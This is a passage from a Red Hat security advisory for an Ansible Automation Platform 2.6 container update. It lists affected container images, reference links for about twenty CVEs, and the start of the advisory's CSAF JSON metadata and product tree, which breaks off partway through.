| Unresolved product id: Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64 | — |
Workaround
|
| URL | Category |
|---|---|
| https://access.redhat.com/errata/RHSA-2026:50479 | self |
| https://access.redhat.com/security/cve/CVE-2026-11332 | external |
| https://access.redhat.com/security/cve/CVE-2026-13149 | external |
| https://access.redhat.com/security/cve/CVE-2026-13676 | external |
| https://access.redhat.com/security/cve/CVE-2026-18141 | external |
| https://access.redhat.com/security/cve/CVE-2026-34993 | external |
| https://access.redhat.com/security/cve/CVE-2026-40898 | external |
| https://access.redhat.com/security/cve/CVE-2026-44545 | external |
| https://access.redhat.com/security/cve/CVE-2026-48990 | external |
| https://access.redhat.com/security/cve/CVE-2026-54058 | external |
| https://access.redhat.com/security/cve/CVE-2026-54060 | external |
| https://access.redhat.com/security/cve/CVE-2026-54283 | external |
| https://access.redhat.com/security/cve/CVE-2026-55379 | external |
| https://access.redhat.com/security/cve/CVE-2026-55380 | external |
| https://access.redhat.com/security/cve/CVE-2026-59197 | external |
| https://access.redhat.com/security/cve/CVE-2026-59869 | external |
| https://access.redhat.com/security/cve/CVE-2026-59886 | external |
| https://access.redhat.com/security/cve/CVE-2026-59939 | external |
| https://access.redhat.com/security/cve/CVE-2026-8643 | external |
| https://access.redhat.com/security/cve/CVE-2026-9595 | external |
| https://access.redhat.com/security/updates/classi… | external |
| https://docs.redhat.com/en/documentation/red_hat_… | external |
| https://security.access.redhat.com/data/csaf/v2/a… | self |
| https://access.redhat.com/security/cve/CVE-2026-8643 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2460927 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-8643 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-8643 | external |
| https://github.com/pypa/pip/commit/8eb178480bd1a2… | external |
| https://access.redhat.com/security/cve/CVE-2026-9595 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2488934 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-9595 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-9595 | external |
| https://cna.openjsf.org/security-advisories.html | external |
| https://github.com/facebook/create-react-app/pull/7444 | external |
| https://github.com/vuejs/vue-cli/commit/72ba7505a… | external |
| https://github.com/webpack/webpack-dev-server/pull/4316 | external |
| https://github.com/webpack/webpack-dev-server/sec… | external |
| https://access.redhat.com/security/cve/CVE-2026-11332 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2485379 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-11332 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-11332 | external |
| https://github.com/ansible/ansible | external |
| https://access.redhat.com/security/cve/CVE-2026-13149 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2494813 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-13149 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-13149 | external |
| https://github.com/juliangruber/brace-expansion/c… | external |
| https://www.npmjs.com/package/brace-expansion | external |
| https://access.redhat.com/security/cve/CVE-2026-13676 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2494197 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-13676 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-13676 | external |
| https://github.com/fastify/fast-uri/security/advi… | external |
| https://access.redhat.com/security/cve/CVE-2026-18141 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2508155 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-18141 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-18141 | external |
| https://access.redhat.com/security/cve/CVE-2026-34993 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2484099 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-34993 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-34993 | external |
| https://github.com/aio-libs/aiohttp/commit/dcf40f… | external |
| https://github.com/aio-libs/aiohttp/security/advi… | external |
| https://access.redhat.com/security/cve/CVE-2026-40898 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2484875 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-40898 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-40898 | external |
| https://github.com/quic-go/quic-go/releases/tag/v0.59.1 | external |
| https://github.com/quic-go/quic-go/security/advis… | external |
| https://access.redhat.com/security/cve/CVE-2026-44545 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2484377 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-44545 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-44545 | external |
| https://github.com/django/daphne/blob/main/CHANGE… | external |
| https://access.redhat.com/security/cve/CVE-2026-48990 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2490168 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-48990 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-48990 | external |
| https://github.com/authlib/joserfc/releases/tag/1.6.7 | external |
| https://github.com/authlib/joserfc/security/advis… | external |
| https://access.redhat.com/security/cve/CVE-2026-54058 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2500057 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-54058 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-54058 | external |
| https://github.com/python-pillow/Pillow/commit/6a… | external |
| https://github.com/python-pillow/Pillow/pull/9719 | external |
| https://github.com/python-pillow/Pillow/releases/… | external |
| https://github.com/python-pillow/Pillow/security/… | external |
| https://access.redhat.com/security/cve/CVE-2026-54060 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2497466 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-54060 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-54060 | external |
| https://github.com/python-pillow/Pillow/blob/main… | external |
| https://github.com/python-pillow/Pillow/commit/0a… | external |
| https://github.com/python-pillow/Pillow/security/… | external |
| https://access.redhat.com/security/cve/CVE-2026-54283 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2491440 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-54283 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-54283 | external |
| https://github.com/Kludex/starlette/security/advi… | external |
| https://access.redhat.com/security/cve/CVE-2026-55379 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2497452 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-55379 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-55379 | external |
| https://github.com/python-pillow/Pillow/security/… | external |
| https://access.redhat.com/security/cve/CVE-2026-55380 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2497455 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-55380 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-55380 | external |
| https://github.com/python-pillow/Pillow/commit/f3… | external |
| https://github.com/python-pillow/Pillow/security/… | external |
| https://access.redhat.com/security/cve/CVE-2026-59197 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2500043 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-59197 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-59197 | external |
| https://github.com/python-pillow/Pillow/commit/cc… | external |
| https://github.com/python-pillow/Pillow/pull/9695 | external |
| https://github.com/python-pillow/Pillow/security/… | external |
| https://access.redhat.com/security/cve/CVE-2026-59869 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2498122 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-59869 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-59869 | external |
| https://github.com/nodeca/js-yaml/commit/24f13e79… | external |
| https://github.com/nodeca/js-yaml/commit/59423c6f… | external |
| https://github.com/nodeca/js-yaml/releases/tag/3.15.0 | external |
| https://github.com/nodeca/js-yaml/releases/tag/4.3.0 | external |
| https://github.com/nodeca/js-yaml/security/adviso… | external |
| https://access.redhat.com/security/cve/CVE-2026-59886 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2500041 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-59886 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-59886 | external |
| https://github.com/pyasn1/pyasn1/commit/e60c691cb… | external |
| https://github.com/pyasn1/pyasn1/releases/tag/v0.6.4 | external |
| https://github.com/pyasn1/pyasn1/security/advisor… | external |
| https://access.redhat.com/security/cve/CVE-2026-59939 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2498212 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-59939 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-59939 | external |
| https://github.com/httplib2/httplib2/commit/87581… | external |
| https://github.com/httplib2/httplib2/releases/tag… | external |
| https://github.com/httplib2/httplib2/security/adv… | external |
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update is now available for Red Hat Ansible Automation Platform 2.6",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat Ansible Automation Platform provides an enterprise framework for building, deploying and managing IT automation at scale. IT Managers can provide top-down guidelines on how automation is applied to individual teams, while automation developers retain the freedom to write tasks that leverage existing knowledge without the overhead. Ansible Automation Platform makes it possible for users across an organization to share, vet, and manage automation content by means of a simple, powerful, and agentless language.\n\nFor details about this release, refer to the release notes listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:50479",
"url": "https://access.redhat.com/errata/RHSA-2026:50479"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-11332",
"url": "https://access.redhat.com/security/cve/CVE-2026-11332"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-13149",
"url": "https://access.redhat.com/security/cve/CVE-2026-13149"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-13676",
"url": "https://access.redhat.com/security/cve/CVE-2026-13676"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-18141",
"url": "https://access.redhat.com/security/cve/CVE-2026-18141"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-34993",
"url": "https://access.redhat.com/security/cve/CVE-2026-34993"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-40898",
"url": "https://access.redhat.com/security/cve/CVE-2026-40898"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-44545",
"url": "https://access.redhat.com/security/cve/CVE-2026-44545"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-48990",
"url": "https://access.redhat.com/security/cve/CVE-2026-48990"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-54058",
"url": "https://access.redhat.com/security/cve/CVE-2026-54058"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-54060",
"url": "https://access.redhat.com/security/cve/CVE-2026-54060"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-54283",
"url": "https://access.redhat.com/security/cve/CVE-2026-54283"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-55379",
"url": "https://access.redhat.com/security/cve/CVE-2026-55379"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-55380",
"url": "https://access.redhat.com/security/cve/CVE-2026-55380"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-59197",
"url": "https://access.redhat.com/security/cve/CVE-2026-59197"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-59869",
"url": "https://access.redhat.com/security/cve/CVE-2026-59869"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-59886",
"url": "https://access.redhat.com/security/cve/CVE-2026-59886"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-59939",
"url": "https://access.redhat.com/security/cve/CVE-2026-59939"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-8643",
"url": "https://access.redhat.com/security/cve/CVE-2026-8643"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-9595",
"url": "https://access.redhat.com/security/cve/CVE-2026-9595"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "external",
"summary": "https://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6/whats_new-async_updates",
"url": "https://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6/whats_new-async_updates"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_50479.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Ansible Automation Platform 2.6 Container Release Update",
"tracking": {
"current_release_date": "2026-08-05T02:30:38+00:00",
"generator": {
"date": "2026-08-05T02:30:38+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "5.3.8"
}
},
"id": "RHSA-2026:50479",
"initial_release_date": "2026-08-04T21:39:16+00:00",
"revision_history": [
{
"date": "2026-08-04T21:39:16+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-08-04T21:39:34+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-08-05T02:30:38+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.6",
"product": {
"name": "Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform:2.6::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat Ansible Automation Platform"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"product_identification_helper": {
"purl": "pkg:oci/platform-operator-bundle@sha256%3A62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform/platform-operator-bundle\u0026tag=1785788232"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mcp-server-rhel9@sha256%3A18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9\u0026tag=1785773509"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"product_identification_helper": {
"purl": "pkg:oci/aap-must-gather-rhel9@sha256%3A1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9\u0026tag=1785630119"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/platform-operator-bundle@sha256%3Af72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform/platform-operator-bundle\u0026tag=1785788247"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ansible-builder-rhel9@sha256%3Ac4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9\u0026tag=1785745574"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ansible-devspaces-rhel9@sha256%3A7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9\u0026tag=1785629819"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ansible-dev-tools-rhel9@sha256%3A97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9\u0026tag=1785784320"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-chatbot-rhel9@sha256%3Aa4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9\u0026tag=1785646188"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
